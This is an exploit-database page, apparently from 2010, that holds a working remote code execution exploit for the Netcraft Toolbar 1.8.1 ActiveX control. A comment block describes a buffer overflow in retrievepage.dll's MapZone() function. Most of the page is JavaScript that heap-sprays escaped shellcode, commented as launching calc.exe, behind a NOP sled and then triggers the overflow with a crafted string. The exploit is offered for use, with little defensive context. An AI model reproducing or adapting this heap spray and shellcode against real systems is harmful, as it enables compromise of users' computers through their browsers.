Netcraft Toolbar 1.8.1 Remote Code Execution Exploit

2010-11-23 13:15:12

<!--

Title: Netcraft Toolbar 1.8.1 Remote Code Execution Exploit
Date: Nov 23, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://toolbar.netcraft.com/install/Netcraft%20Toolbar.msi
Version: 1.8.1
Tested on: WinXP - IE 6
CVE: NA (0day)

This object is NOT marked safe for scripting so the impact of this issue is small. You'll have to
enable loading of unsafe ActiveX controls to be able to test it.

There is a classic buffer overflow in "%PROGRAMFILES%\Netcraft Toolbar\retrievepage.dll".
By supplying an overly long string to the MapZone() function we can blah blah blah... this
has been covered 10000000 times. Our offset is... [75 junk bytes][ebp][eip]. l33th4x iknowright.

NOTE:
This issue appears to get patched silently after the Netcraft Toolbar loads up in IE. retrievepage.dll
gets replaced however curiously, both the old and new dlls have the SAME version number (1.0.1.0), and
there is no indication an update has occured. Maybe Netcraft is trying to hide the vulnerability?
I dont know. The vulnerable dll is 180KB whereas the patched one is 172KB. Meh, just fyi. Make sure
it's loading the 180KB one when testing.

much love to irc.rizon.net#beer

PS:
Any Information Security firms looking for a knowledgeable, motivated intern?
I sure would love to talk to you.

-->

<object classid='clsid:73F57628-B458-11D4-9673-00A0D212FC63' id='target' /></object>

<script>

// runs calc.exe
var shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);

var nops = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;

while(nops.length < slackspace) {
nops += nops;
}

var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);

while((block.length + slackspace) < 0x50000) {
block = block + block + fillblock;
}

// Do a little dance...
memory=new Array();
for(counter=0; counter<200; counter++){
memory[counter] = block + shellcode;
}

// Make a little love...
var pwnt = "";
while(pwnt.length <= 83){
pwnt += "\x0c";
}


// Get down tonight!
document.getElementById('target').MapZone( pwnt );

</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.